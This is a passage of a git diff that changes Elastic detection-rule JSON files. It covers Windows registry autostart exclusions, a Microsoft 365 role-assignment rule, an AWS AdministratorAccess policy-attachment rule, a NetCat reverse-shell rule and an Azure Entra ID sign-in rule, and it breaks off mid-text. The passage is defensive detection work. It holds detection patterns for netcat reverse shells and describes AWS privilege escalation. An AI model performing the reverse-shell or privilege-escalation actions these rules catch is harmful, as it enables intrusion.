--win-session-start /prefetch:5\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --win-session-start\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\",\n \"?:\\\\ProgramData\\\\*\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background*\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background*\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"OneDrive.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"\n ) or\n \n process.name : \"Microsoft.SharePoint.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"MicrosoftEdgeUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\Expedient\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\*\\\\MicrosoftEdgeUpdateCore.exe\\\"\"\n ) or\n \n process.executable : \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\\\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\ProgramData\\\\*\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\Program Files\\\\Slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* Cisco */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n (\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n ) or\n (\n process.name : \"CiscoJabber.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Cisco Systems\\\\Cisco Jabber\\\\CiscoJabber.exe\\\" /min\"\n )\n )\n ) or\n\n /* Loom */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Loom, Inc.\" and\n process.name : \"Loom.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Loom\\\\Loom.exe --process-start-args \\\"--loomHidden\\\"\"\n )\n ) or\n\n /* Adobe */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n process.name : (\"Acrobat.exe\", \"FlashUtil32_*_Plugin.exe\") and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\Macromed\\\\Flash\\\\FlashUtil32_*_Plugin.exe -update plugin\"\n )\n ) or\n\n /* CCleaner */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"PIRIFORM SOFTWARE LIMITED\" and\n process.name : (\"CCleanerBrowser.exe\", \"CCleaner64.exe\") and registry.data.strings : (\n \"\\\"C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\\\"Default\\\"\",\n \"\\\"C:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\\\" /MONITOR\"\n )\n ) or\n\n /* Opera */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Opera Norway AS\" and\n process.name : \"opera.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera\\\\launcher.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera GX\\\\launcher.exe\"\n )\n ) or\n\n /* Avast */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Avast Software s.r.o.\" and\n process.name : \"AvastBrowser.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\\\"?:\\\\Program Files (x86)\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\"\n )\n ) or\n\n /* Grammarly */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Grammarly, Inc.\" and\n process.name : \"GrammarlyInstaller.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Grammarly\\\\DesktopIntegrations\\\\Grammarly.Desktop.exe\"\n )\n )\n )\n", - "references": [ - "https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.subject_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.trusted", - "type": "boolean" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.data.strings", - "type": "wildcard" - }, - { - "ecs": true, - "name": "registry.hive", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "registry.value", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1547", - "name": "Boot or Logon Autostart Execution", - "reference": "https://attack.mitre.org/techniques/T1547/", - "subtechnique": [ - { - "id": "T1547.001", - "name": "Registry Run Keys / Startup Folder", - "reference": "https://attack.mitre.org/techniques/T1547/001/" - } - ] - } - ] - } - ], - "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", - "timeline_title": "Comprehensive Registry Timeline", - "timestamp_override": "event.ingested", - "type": "eql", - "version": 115 - }, - "id": "97fc44d3-8dae-4019-ae83-298c3015600f_115", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_207.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_207.json deleted file mode 100644 index c61814d81e0..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", - "false_positives": [ - "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Management Group Role Assignment", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Management Group Role Assignment\n\nMicrosoft 365 Exchange Management roles define permissions for managing Exchange environments. Adversaries may exploit this by assigning roles to unauthorized users, ensuring persistent access. The detection rule monitors successful role assignments within Exchange, flagging potential unauthorized changes that align with persistence tactics, thus aiding in identifying and mitigating unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the event details to confirm the event.action is \"New-ManagementRoleAssignment\" and the event.outcome is \"success\" to ensure the alert is valid.\n- Identify the user account associated with the role assignment by examining the event.dataset and event.provider fields, and verify if the account is authorized to make such changes.\n- Check the history of role assignments for the identified user to determine if there are any patterns of unauthorized or suspicious activity.\n- Investigate the specific management role that was assigned to understand its permissions and potential impact on the environment.\n- Correlate this event with other recent activities from the same user or IP address to identify any additional suspicious behavior or anomalies.\n- Consult with the relevant IT or security teams to verify if the role assignment was part of a legitimate administrative task or change request.\n\n### False positive analysis\n\n- Routine administrative role assignments can trigger alerts. Regularly review and document legitimate role changes to differentiate them from unauthorized activities.\n- Automated scripts or tools used for role management may cause false positives. Identify and whitelist these tools to prevent unnecessary alerts.\n- Changes made during scheduled maintenance windows might be flagged. Establish a process to temporarily suppress alerts during these periods while ensuring post-maintenance reviews.\n- Role assignments related to onboarding or offboarding processes can appear suspicious. Implement a verification step to confirm these changes align with HR records and expected activities.\n- Frequent role changes by specific users with administrative privileges may not indicate malicious intent. Monitor these users' activities and establish a baseline to identify deviations from normal behavior.\n\n### Response and remediation\n\n- Immediately revoke the newly assigned management role from the unauthorized user to prevent further unauthorized access or changes.\n- Conduct a thorough review of recent activity logs for the affected account to identify any suspicious actions taken since the role assignment.\n- Reset the credentials of the compromised account and enforce multi-factor authentication to enhance security.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring on the affected account and similar high-privilege accounts to detect any further unauthorized attempts.\n- Review and update access control policies to ensure that only authorized personnel can assign management roles in Microsoft 365.\n- Consider conducting a security awareness session for administrators to reinforce the importance of monitoring and managing role assignments securely.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aa4be8d-5828-417d-9f54-7cd304571b24_8.json b/packages/security_detection_engine/kibana/security_rule/9aa4be8d-5828-417d-9f54-7cd304571b24_8.json new file mode 100644 index 00000000000..d2ef02579d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aa4be8d-5828-417d-9f54-7cd304571b24_8.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by attaching additional permissions to compromised user accounts. This rule looks for use of the IAM AttachUserPolicy API operation to attach the highly permissive AdministratorAccess AWS managed policy to an existing IAM user.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `AttachUserPolicy` API operation to attach the `AdministratorAccess` policy to the target user." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "user.target.name", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM AdministratorAccess Policy Attached to User", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM AdministratorAccess Policy Attached to User\n\nThe AWS-managed `AdministratorAccess` policy grants full access to all AWS services and resources. \nWhen attached to a user, it effectively elevates that user to full administrative privileges. \nAn adversary with `iam:AttachUserPolicy` permissions can abuse this operation to escalate privileges or maintain persistence. \nThis rule detects `AttachUserPolicy` events where the attached policy name is `AdministratorAccess`.\n\n#### Possible investigation steps\n\n- **Validate intent and context.** \n Identify the calling user (`aws.cloudtrail.user_identity.arn`) and the target IAM user (`aws.cloudtrail.request_parameters.userName`). \n Confirm whether this was an intentional administrative action, part of provisioning automation, or a potential privilege escalation. \n\n- **Review CloudTrail event details.** \n Check `source.ip`, `user_agent.original`, and `source.geo` fields. \n Compare to historical login or automation behavior. Unrecognized IPs, non-SDK user agents, or new regions may indicate misuse. \n\n- **Correlate with related IAM activity.** \n Search CloudTrail for additional IAM events around the same time (`CreateUser`, `CreateAccessKey`, `AttachGroupPolicy`, `PutUserPolicy`, etc.) that could indicate lateral movement or persistence attempts. \n\n- **Review the target user\u2019s permissions.** \n Determine if the target user already had elevated privileges or if this represents a meaningful privilege increase. \n Check for new API calls from the target user post-attachment, especially `CreateAccessKey`, `UpdateAssumeRolePolicy`, or S3 access attempts. \n\n- **Investigate associated entities.** \n Look for other alerts tied to the same caller or target within the past 48 hours to identify potential correlated activity. \n\n### False positive analysis\n\n- **Legitimate administrative change.** \n Policy attachments may be expected during provisioning or troubleshooting. Validate through change management records. \n- **Authorized automation.** \n Some CI/CD pipelines or identity automation systems temporarily attach this policy. Review automation logs and intended IAM behavior. \n- **Delegated admin scenarios.** \n Verify if the calling user or role is part of a delegated IAM administration group.\n\n### Response and remediation\n\n> Per AWS IR Playbooks, unauthorized administrative policy attachment represents a Privilege Escalation event.\n\n**1. Immediate containment**\n- Detach the policy. Remove the `AdministratorAccess` policy from the affected IAM user immediately (`aws iam detach-user-policy`). \n- Rotate credentials. Rotate passwords and access keys for both the caller and target users. \n- Restrict IAM permissions. Temporarily remove `iam:AttachUserPolicy` privileges from non-administrative roles during scoping. \n- Enable or confirm MFA for affected accounts. \n\n**2. Evidence preservation**\n- Export related `AttachUserPolicy` CloudTrail events \u00b130 minutes from the alert to a secure evidence bucket. \n- Preserve GuardDuty findings and AWS Config snapshots for correlation. \n\n**3. Scoping and investigation**\n- Search CloudTrail for subsequent use of the affected user\u2019s credentials. \n Look for newly created keys, S3 access, or changes to IAM trust policies. \n- Review other accounts for similar policy attachment attempts from the same user or IP. \n\n**4. Recovery and hardening**\n- Reinforce least privilege by granting only role-based admin access instead of direct user-level AdministratorAccess. \n- Implement IAM service control policies (SCPs) to prevent attachment of `AdministratorAccess` except for trusted roles. \n- Enable CloudTrail, GuardDuty, and Security Hub across all regions. \n- Regularly audit IAM policy attachments through AWS Config or CloudFormation drift detection. \n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/): response steps related to IAM policy modification and unauthorized privilege escalation. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** for containment, analysis, and recovery guidance. \n- **AWS Documentation:** [AdministratorAccess Policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html#jf_administrator). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", + "query": "iam where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"AttachUserPolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"policyArn=arn:aws:iam::aws:policy/AdministratorAccess\")\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachUserPolicy.html", + "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html", + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aa4be8d-5828-417d-9f54-7cd304571b24", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "9aa4be8d-5828-417d-9f54-7cd304571b24_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1.json b/packages/security_detection_engine/kibana/security_rule/9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1.json new file mode 100644 index 00000000000..5aa6705a8f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempt to execute via a reverse shell using the netcat utility to execute Windows commands using the default interpreters like Cmd.exe and Powershell.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Command Shell via NetCat", + "note": "## Triage and analysis\n\n### Investigating Potential Command Shell via NetCat\n\nAttackers may abuse the NetCat utility to execute commands remotely using the builtin Windows Command Shell interpreters.\n\n#### Possible investigation steps\n\n- Verify if the user is authorized to use the Netcat utility.\n- Investigate the process execution chain (parent process tree) and how the netcat binary was dropped.\n- Review the network connections made by the parent process and check their reputation.\n- Investiguate all child processes spawned by the Cmd or Powershell instance.\n- Examine the host for other alerts within the same period.\n\n### False positive analysis\n\n- IT Support or system amdinistrator authorized activity using NetCat.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.name : (\"cmd.exe\", \"powershell.exe\") and process.parent.args : \"-e\" and\n (\n (process.parent.args_count == 5 and process.parent.command_line regex~ \"\"\".*[0-9]{1,3}(\\.[0-9]{1,3}){3}.*\"\"\") or\n (process.parent.args : \"-*l*\" and process.parent.args : \"-*p*\" and process.parent.args : (\"cmd.exe\", \"powershell.exe\"))\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + } + ], + "risk_score": 73, + "rule_id": "9c0f61fa-abf4-4b11-8d9d-5978c09182dd", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "9c0f61fa-abf4-4b11-8d9d-5978c09182dd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9e11faee-fddb-11ef-8257-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/9e11faee-fddb-11ef-8257-f661ea17fbcd_1.json deleted file mode 100644 index 125706907bb..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9e11faee-fddb-11ef-8257-f661ea17fbcd_1.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Entra ID Rare Authentication Requirement for Principal User", - "new_terms_fields": [ - "azure.signinlogs.properties.user_principal_name", - "azure.signinlogs.properties.authentication_requirement" - ], - "note": "## Triage and analysis\n\n### Investigating Azure Entra ID Rare Authentication Requirement for Principal User\n\nIdentifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity.\n\n**This is a New Terms rule that focuses on first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication requirement `azure.signinlogs.properties.authentication_requirement` in the last 14-days.**\n\n### Possible investigation steps\n\n- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.\n- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.\n- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks.\n- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.\n- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.\n- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.\n- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration.\n\n## False positive analysis\n\n### Common benign scenarios\n- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.\n- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.\n- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.\n\n### How to reduce false positives\n- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.\n- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.\n- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.\n- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.\n\n## Response and remediation\n\n### Immediate actions\n- Block the source IP address in `source.ip` if determined to be malicious.\n- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.\n- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.\n- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.\n- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n\n### Long-term mitigation\n- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.\n- Regularly review and update conditional access policies to ensure they are effective against evolving threats.\n- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.\n- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure 